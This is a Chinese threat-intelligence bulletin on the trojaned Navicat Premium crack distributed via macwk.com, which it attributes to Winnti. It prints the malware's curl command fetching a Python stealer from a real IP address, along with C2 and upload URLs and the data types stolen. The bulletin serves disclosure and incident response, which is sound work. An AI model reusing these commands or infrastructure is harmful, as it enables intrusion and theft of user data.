突发!国内某 macOS 应用下载站遭黑客投毒攻击,企业请迅速自查! 企业请迅速自查

  • A+
所属分类:业界关注

本文来自:微步在线威胁情报通报


编号: TB-2022-0021 报告置信度:90

TAG: 软件供应链攻击 macOS navicat 投毒 APT 攻击 Winnti

TLP: (仅限接受报告的组织内部使用)

日期: 2022-02-22

················· ···············

    微步情报局监测发现,国内某第三方 macOS 应用下载(www.macwk.com)上出现被APT 组织投毒的数据库管理应用 Navicat Premium。Navicat Premium 是一款流行的收费数据库管理应用,攻击者利用部分使用者寻找破解版的需求,在流行的第三方 macOS 应用下载站投放被投毒的 Navicat Premium 破解版,进而实现对下载使用者的入侵。鉴于该站点上此应用下载量较高(历史总计超 37 万次),且投毒事件超过三周,我们判断该事件影响范围较广。

经过微步情报局关联分析,相关木马与 2021 年 9 月份微步情报局披露的安全事件-macOS 平台上多款常用运维工具遭 APT 投毒攻击中使用的木马相同,因此将攻击者归属为Winnti 族组织。

    微步情报局建议高度重视本次软件供应链投毒攻击,并根据附件 IOC 及时排查相关企业/部门内部是否存在相关网络威胁,保护自身安全。


················事件概要··············

攻击目标 

全行业
攻击时间 2022 年 1 月 30 日至今
攻击向量    供应链攻击
攻击复杂度

················事件详情··············

    2022 年 2 月,微步情报局监测发现,第三方 macOS 应用下载站(www.macwk.com)上出现被 APT 组织投毒的数据库管理应用 Navicat Premium。Navicat Premium是一款流行的收费数据库管理应用,攻击者利用部分使用者寻找破解版的需求,在流行的第三方 macOS 应用下载站投放被投毒的 Navicat Premium 破解版,进而实现对下载使用者的入侵。

    根据此下载网站的统计,该应用下载总次数在 37 万次以上,影响范围十分广泛。

➢ 第三方 macOS 应用下载站(www.macwk.com)上被投毒的 Navicat Premium

突发!国内某 macOS 应用下载站遭黑客投毒攻击,企业请迅速自查! 企业请迅速自查

对被投毒的 Navicat Premium 破解版进行分析,其运行流程为下图:

突发!国内某 macOS 应用下载站遭黑客投毒攻击,企业请迅速自查! 企业请迅速自查

被投毒的NavicatPremium在运行后加载libcrypto.2.dylib,然后请求云端地址

https://www.jackteng.com/aCbnd4bZaXXkQNVB/v.php。该云端地址返回执行命令curl-sfo\tmp\d.pyhttp:\\120.77.35.111\d.py

突发!国内某 macOS 应用下载站遭黑客投毒攻击,企业请迅速自查! 企业请迅速自查

加载libcrypto.2.dylib 

d.py是python编写的木马程序,具备收集数据并将数据上传至C&C服务器的能力,包含当前操作系统的信息、应用列表、主机名和IP地址的映射关系、用户名、本地IP、git 全局信息、bash历史记录、zsh历史记录等。收集到的数据会首先被写到/Users/{username}/Library/Logs/tmp/目录的文件中,然后上传文件到http://120.77.35.111/u.php?id=

突发!国内某 macOS 应用下载站遭黑客投毒攻击,企业请迅速自查! 企业请迅速自查

收集的信息

经过关联分析,此攻击手法和使用的木马与2021年9月份微步情报局曾披露安全事件-macOS平台上多款常用运维工具遭APT投毒攻击中相同,因此将此次攻击的攻击者归属为Winnti族组织。

突发!国内某 macOS 应用下载站遭黑客投毒攻击,企业请迅速自查! 企业请迅速自查

突发!国内某 macOS 应用下载站遭黑客投毒攻击,企业请迅速自查! 企业请迅速自查

突发!国内某 macOS 应用下载站遭黑客投毒攻击,企业请迅速自查! 企业请迅速自查

突发!国内某 macOS 应用下载站遭黑客投毒攻击,企业请迅速自查! 企业请迅速自查

突发!国内某 macOS 应用下载站遭黑客投毒攻击,企业请迅速自查! 企业请迅速自查

报告-macOS平台上多款常用运维工具遭APT投毒攻击

················处置建议··············

1.    根据威胁情报,排查网络中从第三方应用下载站进行下载安装应用的主机,逐台清理。

2.    微步在线云端已更新相关情报,建议更新TDP情报至最新版本,并全面覆盖贵单位网络区域。关注含有标签Winnti的告警。

3.    加强应用软件安装规范,避免安装不可靠来源的第三方应用,建议通过AppStore以及官方网站安装应用软件。



  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin